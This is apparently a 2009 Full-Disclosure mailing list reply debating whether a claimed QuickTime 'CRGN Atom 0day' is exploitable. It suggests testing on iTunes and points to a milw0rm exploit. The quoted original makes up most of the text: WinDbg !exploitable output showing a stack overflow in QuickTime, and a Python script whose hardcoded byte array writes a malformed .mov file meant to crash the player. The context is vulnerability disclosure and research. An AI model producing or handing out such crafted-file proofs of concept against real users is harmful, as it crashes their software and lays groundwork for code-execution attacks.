Hi WebDEVIL, You base your PoC on this plugin (http://www.codeplex.com/msecdbg) for windbg (as copy/pasted), but i wonder, what make you think it's really exploitable (on quicktime) ? Have you tried that PoC on Itunes ? Itunes, use Quicktime as a module to read .mov files, but Itunes doesn't have the same memory protection than Quicktime, for example see : http://milw0rm.com/exploits/7296 , it still works on the last one today [Itunes 8.2.0.23]
What do you get with your Poc when you play with it on Itunes ? Thanks 2009/6/15 webDEViL <w3bd3...@gmail.com> > Try it with your latest quicktime player. > -------------------------------------------------------------- > > #0:000> !exploitable -v > #HostMachine\HostUser > #Executing Processor Architecture is x86 > > #Debuggee is in User Mode > #Debuggee is a live user mode debugging session on the local machine > #Event Type: Exception > #Exception Faulting Address: 0x66830f9b > #First Chance Exception Type: STATUS_STACK_OVERFLOW (0xC00000FD) > > # > #Faulting Instruction:66830f9b push ebx > # > #Basic Block: > # 66830f9b push ebx > # Tainted Input Operands: ebx > # 66830f9c push ebp > # 66830f9d mov ebp,dword ptr <unloaded_papi.dll>+0x41f (00000420)[esp] > > # 66830fa4 push esi > # 66830fa5 push edi > # 66830fa6 mov edi,ecx > # 66830fa8 cmp edi,offset <unloaded_papi.dll>+0x5ff (00000600) > # 66830fae mov ebx,edx > # 66830fb0 mov dword ptr [esp+14h],eax > > # 66830fb4 mov byte ptr [esp+10h],0 > # 66830fb9 mov byte ptr [esp+11h],0 > # 66830fbe mov byte ptr [esp+12h],0 > # 66830fc3 je quicktime!dllmain+0x2fbc4 (668310a4) > # > #Exception Hash (Major/Minor): 0x614b6671.0x614b786e > > # > #Stack Trace: > #QuickTime!DllMain+0x2fabb > #<Unloaded_papi.dll>+0x1231137 > #Instruction Address: 0x66830f9b > # > #Description: Stack Overflow > #Short Description: StackOverflow > #Exploitability Classification: UNKNOWN > > #Recommended Bug Title: Stack Overflow starting at QuickTime!DllMain+0x2fabb > (Hash=0x614b6671.0x614b786e) > > print "------------------------------" > print "w3bd3vil [at] gmail [dot] com" > print "Apple QuickTime CRGN Atom 0day" > > print "------------------------------" > bytes = [ > 0x00, 0x00, 0x00, 0x18, 0x66, 0x74, 0x79, 0x70, 0x33, 0x67, 0x70, > 0x35, 0x00, 0x00, 0x01, 0x00, 0x33, 0x67, 0x70, 0x35, 0x33, 0x67, > 0x70, 0x34, 0x00, 0x00, 0x01, 0x16, 0x6D, 0x6F, 0x6F, 0x76, 0x00, > > 0x00, 0x00, 0x6C, 0x6D, 0x76, 0x68, 0x64, 0x00, 0x00, 0x00, 0x00, > 0xBF, 0x88, 0x12, 0x28, 0xBF, 0x88, 0x12, 0x28, 0x00, 0x00, 0x02, > 0x58, 0x00, 0x00, 0x0B, 0x90, 0x00, 0x01, 0x00, 0x00, 0x01, 0x00, > 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, > > 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, > 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, > 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, > 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, > > 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, > 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x03, 0x00, 0x00, 0x00, > 0xA2, 0x74, 0x72, 0x61, 0x6B, 0x00, 0x00, 0x00, 0x5C, 0x74, 0x6B, > 0x68, 0x64, 0x00, 0x00, 0x00, 0x01, 0xBF, 0x88, 0x12, 0x28, 0xBF, > > 0x88, 0x12, 0x28, 0x00, 0x00, 0x00, 0x02, 0x00, 0x00, 0x00, 0x00, > 0x00, 0x00, 0x0B, 0x90, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, > 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, > 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, > > 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, > 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, > 0x00, 0x00, 0xB0, 0x00, 0x00, 0x00, 0x90, 0x00, 0x00, 0x00, 0x00, > 0x00, 0x1A, 0x63, 0x6C, 0x69, 0x70, 0x00, 0x00, 0x00, 0x0E, 0x63, > > 0x72, 0x67, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, > 0xFF, 0xFF, 0x00, 0x00, 0x00, 0x24, 0x65, 0x64, 0x74, 0x73, 0x00, > 0x00, 0x00, 0x1c, 0x65, 0x6c, 0x73, 0x74, 0x00, 0x00, 0x00, 0x00, > 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x0b, 0x90, 0x00, 0x00, 0x00, > > 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x08, 0x66, 0x72, > 0x65, 0x65, 0x00, 0x00, 0x00, 0x08, 0x66, 0x72, 0x65, 0x65 ] > > f = open("webDEViL.mov", "wb") > for byte in bytes: f.write("%c" % byte) > > f.close() > print "webDEViL.mov created! (%d bytes)" % len(bytes) > > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ >
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/